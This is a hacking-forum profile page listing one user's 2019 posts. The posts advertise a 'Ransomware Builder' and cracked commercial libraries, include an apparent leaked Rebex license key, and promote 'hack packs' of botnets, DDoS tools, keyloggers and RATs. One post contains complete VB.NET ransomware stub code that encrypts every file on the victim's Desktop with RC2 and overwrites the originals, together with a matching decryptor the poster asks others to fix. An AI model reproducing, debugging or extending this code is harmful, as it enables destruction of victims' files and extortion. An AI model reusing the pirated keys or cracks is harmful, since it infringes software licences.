ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!

Jump to content

arsium's Content

There have been 110 items by arsium (Search limited from Apr 21, 2023)


By content type

See this member's


Sort by                Order  

#20510566 Arsium Ransomware Builder [ONLY DESKTOP] [WITH AND WITHOUT DLL]

Posted by arsium on 07 August 2019 - 10:16 AM in Cracked Programs

PM me when updated, please

I updated the link here  :)




#20510411 Arsium Ransomware Builder [ONLY DESKTOP] [WITH AND WITHOUT DLL]

Posted by arsium on 07 August 2019 - 10:06 AM in Cracked Programs

the fist popup said it requested smartassembly to be on the PC.. then i installed smartassembly and then another popup came where is states that the project wasn't made on the same PC.. *facepalm*

Will correct that right know !

EDIT : CORRECTED !




#20510157 Arsium Ransomware Builder [ONLY DESKTOP] [WITH AND WITHOUT DLL]

Posted by arsium on 07 August 2019 - 09:47 AM in Cracked Programs

lets try this shit :)

EDIT: Shit won't start.. warning box pops up 

What ? What does it mean ?




#20499884 Arsium Ransomware Builder [ONLY DESKTOP] [WITH AND WITHOUT DLL]

Posted by arsium on 06 August 2019 - 10:06 PM in Cracked Programs

Hello everyone I'm back with my new application uploaded recently called "Arsium Ransomware Builder" ( REQUIRED 4.7.2 framework ) . It comes with more and powerful encryption/decryption method. Of course it encrypts ONLY DESKTOP at this moment but I will add new options for others paths. 

 

NOTE : you get some bugs with this version , send me PM.

 

What's new in this version ?

 

Encryptions methods:

 

8 powerful methods with their options :

 

-AES

-RC4

-Polystairs

-Blowfish

-Rijndael

-TripleDESCng

-Twofish

-and another AES (NEEDS DLL) with more options

 

UI:

 

Capture-d-cran-7.png

 

Capture-d-cran-8.png

 

Capture-d-cran-9.png

 

Capture-d-cran-10.png

 

Capture-d-cran-11.png

 

Options:

 

As you can see , more options are there ! If you don't know what it is (example : cipher) , just choose a random ( example : CBC)

 

 

DLL NOTE :

 

 Only AES WITH DLL needs  "nsoftware.IPWorksEncrypt.System.dll" and "nsoftware.IPWorksEncrypt.dll" next to it (copied-pasted dlls) or merged inside.

 

 

 

The others WITH DLL (RC4 , Blowfish , Twofish) need "Rebex.Common.dll"  "Rebex.Security.dll" next to them (copied-pasted dlls) or merged inside.

 

 

 

I put IlMergerGUI inside.

 

 

 

 

DOWNLOAD link:

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.




#20491697 nsoftware.com/IP*Works! Software [QUESTION]

Posted by arsium on 06 August 2019 - 03:38 PM in Source Codes

Hello everyone , is someone interested in the crack for this suite ? If you don't know what it is , go on https://www.nsoftware.com




#20491405 REBEX TOTAL PACK (2018)

Posted by arsium on 06 August 2019 - 03:26 PM in Source Codes

How use this? 

Use the dll in a project and then put ""Rebex.Licensing.Key = "==AnKxIZnJ2NXyRRk/MrXLh5vsLbImP/JhMGERReY23qIk==" or go one their site and search for unlocking this with key




#20477263 [Taking Requests] Dev software, database tools, User controls

Posted by arsium on 05 August 2019 - 11:50 PM in Requests

https://www.nsoftwar...kb/help/?pid=IE I really need this pls




#20391544 [HUGE LEAKS] Hacking Tools From Darkweb +2GB Tools (worth $1350) Mega Pack

Posted by arsium on 02 August 2019 - 12:40 PM in Cracked Programs

Already shared but anyway :)




#20374260 REBEX TOTAL PACK (2018)

Posted by arsium on 01 August 2019 - 05:08 PM in Source Codes

 Hello dear community I'm back to share with you a dll components with many possibilites of usages (encrypt files , ftp servers.....). Just search how to use or learn by yourself it's easy-learning  :)

 

DOWNLOAD LINK:

 

Hidden Content
You'll be able to see the hidden content once you reply to this topic or upgrade your account.




#20275001 NEED HELP ENCRYPT/DECRYPT FUNCTIONS

Posted by arsium on 28 July 2019 - 03:16 PM in .NET Framework

 Hello guys today I need your help for some functions (RC2) in vbnet. The problem is that the encryption works perfectly but the decryption doesn't work I don't know why :S

If someone can help me, i will thank him in advance

 

The code :

 

Encryption : 

Imports System.Security.Cryptography
Imports Microsoft.Win32
Imports System.Management
Imports System
Imports Microsoft.VisualBasic
Imports System.Diagnostics
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Collections.Generic
Imports System.Drawing
Imports System.Windows.Forms
Imports System.IO
Imports System.Net
Imports System.Drawing.Drawing2D
Imports System.Drawing.Imaging
Imports System.Text
Namespace Stub
    Public Class Main
        Public Shared Function RC2Encrypt(ByVal strInput As String, ByVal strPassword As String) As String
            Dim RC2 As New System.Security.Cryptography.RC2CryptoServiceProvider
            Dim HashRC2 As New System.Security.Cryptography.MD5CryptoServiceProvider
            Dim strEncrypted As String = ""
            Try
                Dim Hash() As Byte = HashRC2.ComputeHash(System.Text.Encoding.Unicode.GetBytes(strPassword))

                RC2.Key = Hash
                RC2.Mode = System.Security.Cryptography.CipherMode.ECB
                Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = RC2.CreateEncryptor
                Dim Buffer As Byte() = System.Text.Encoding.Unicode.GetBytes(strInput)
                strEncrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
                Return strEncrypted
            Catch ex As Exception
            End Try
        End Function
        Public Shared Sub Main()
            Dim filepath2 = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
            IO.File.Delete(filepath2 & "\desktop.ini")
            Dim yu As String
            For Each yu In Directory.GetFiles(filepath2, "*.*", SearchOption.AllDirectories)
                Dim READBYTES As Byte() = System.IO.File.ReadAllBytes(yu)
                Dim PolyC As Byte() = Convert.FromBase64String(RC2Encrypt(Convert.ToBase64String(READBYTES), "123"))
                IO.File.WriteAllBytes(yu, PolyC)
            Next
        End Sub
    End Class
End Namespace

Decryption : 

Imports System.Security.Cryptography
Imports Microsoft.Win32
Imports System.Management
Imports System
Imports Microsoft.VisualBasic
Imports System.Diagnostics
Imports System.Reflection
Imports System.Runtime.InteropServices
Imports System.Collections.Generic
Imports System.Drawing
Imports System.Windows.Forms
Imports System.IO
Imports System.Net
Imports System.Drawing.Drawing2D
Imports System.Drawing.Imaging
Imports System.Text
Namespace Stub
    Public Class Main
        Public Shared Function RC2Decrypt(ByVal strInput As String, ByVal strPassword As String) As String
            Dim RC2 As New System.Security.Cryptography.RC2CryptoServiceProvider
            Dim HashRC2 As New System.Security.Cryptography.MD5CryptoServiceProvider
            Dim strDecrypted As String = ""
            Try
                Dim Hash() As Byte = HashRC2.ComputeHash(System.Text.Encoding.Unicode.GetBytes(strPassword))

                RC2.Key = Hash
                RC2.Mode = System.Security.Cryptography.CipherMode.ECB
                Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = RC2.CreateDecryptor
                Dim Buffer As Byte() = System.Text.Encoding.Unicode.GetBytes(strInput)
                strDecrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
                Return strDecrypted
            Catch ex As Exception
            End Try
        End Function
        Public Shared Sub Main()
            Dim filepath2 = Environment.GetFolderPath(Environment.SpecialFolder.Desktop)
            IO.File.Delete(filepath2 & "\desktop.ini")
            Dim yu As String
            For Each yu In Directory.GetFiles(filepath2, "*.*", SearchOption.AllDirectories)
                Dim READBYTES As Byte() = System.IO.File.ReadAllBytes(yu)
                Dim PolyC As Byte() = Convert.FromBase64String(RC2Decrypt(Convert.ToBase64String(READBYTES), "123"))
                IO.File.WriteAllBytes(yu, PolyC)
            Next
        End Sub
    End Class
End Namespace



#20271600 SpyNote 6.4 Activeted Not Cracked

Posted by arsium on 28 July 2019 - 12:17 PM in Cracked Programs

Works ! Thx man another version  :)




#20113883 Lots of working mega nz accounts

Posted by arsium on 21 July 2019 - 05:04 PM in Other Leaks

 




#20113645 Hack Pack From Dark Web

Posted by arsium on 21 July 2019 - 04:52 PM in Cracked Programs

Hack Pack From Dark Web.

I am not the owner or uploader of none of this tool.

It's a massive pack so it's quite impossible for me to upload all of the tools virus total link.

 

 

Includes :

 

1) Botnets

2) Checkers

3) Anti-Viruses

4) Bombers

5) Botting

6) Bruteforcer

7) Cracking

8) DDoS Programs

9) Deface creator

10) Doxing

11) Exploit & Exploit Scanning

12) Guides

13) Injection Programs

14) MD5 & Misc
17) Resolver

18) Tutorials

19) Source Codes

20) ETC
 

 

 

Got all of this thing from the telegram channel.

Just Sharing in cause you want to see them

NB: RUN IT ON VM/SANDBOX/VPS ( Common Sense)

 

 




#20113549 [PACK] Best Hack Pack

Posted by arsium on 21 July 2019 - 04:48 PM in Cracking Tools

 

Most Wanted Hack Pack

 

  • Anti Viruses
  • BotNets
  • Botting Programs (Ad Fly, ETC)
  • Brute forcing Programs
  • Cracking Programs DDoS
  • Programs Deface Creators
  • Doxing Tools eWhore Packs (Fetish) Exploiting Programs (SQL Map, ParanoicScan, Dedi Exploiter, AirCrack)
  • Exploit Scanners (GoogleSeacher, Gr3eNox Exploit Scanner, Joomla Security Scanner, Realuike Exploit Scanner, RFI Scanner V2, RFI Tool, Special RFI, SQL Poison, XSS Scanner)
  • Exploits (Chat Exploits, MSN Hack, System Exploits, Team Speak)
  • Guides (Anonymity, BotNet, Bruteforce, Cracking, DDoSing, Defacing, Doxing, Exploits, Game Hacking, Hacking, IRL Sh*t, Linux OS, Programming, Random, Reverse Engineering, Security, SQL Injection, Viruses, WiFi Sh*t)
  • Hacking (Ann Loader, Password Stealers)
  • Injection Programs (SQL, XSS) MD5 (MD5 Attack, MD5 Toolbox, MD5 Tools)
  • Sharecash Skype Tools (Reslovers, CenSky Crasher, Florision Tools, James Reborn(V5.7), Pops Skype Tool, Skype API)
  • Source Codes (Crypter Sources, DDoS Programs, KEYLOGGERS, RAT Sources, RANDOM SH*T)
  • Tutorials (TOO MANY TO TYPE)
  • Viruses (Batch Virus Creators, Binders, Crypters, DNS, Keyloggers, Ratting, Spoofing, Spreading)
  • VPN'S & Proxies
  • WiFi Youtube

 

 

 

Road to Contributor

Dont Leech, Keep Sharing

Enjoy :)

 




#20058904 [.NET] Chilkat - Generator for all products (2019)

Posted by arsium on 19 July 2019 - 10:51 AM in .NET Framework

Is it cracked ?